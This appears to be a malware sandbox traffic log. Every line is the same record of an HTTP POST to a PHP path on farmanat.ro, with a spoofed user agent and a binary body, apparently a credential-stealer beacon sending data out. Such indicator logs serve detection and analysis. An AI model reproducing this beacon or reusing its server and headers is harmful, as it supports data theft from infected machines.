        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
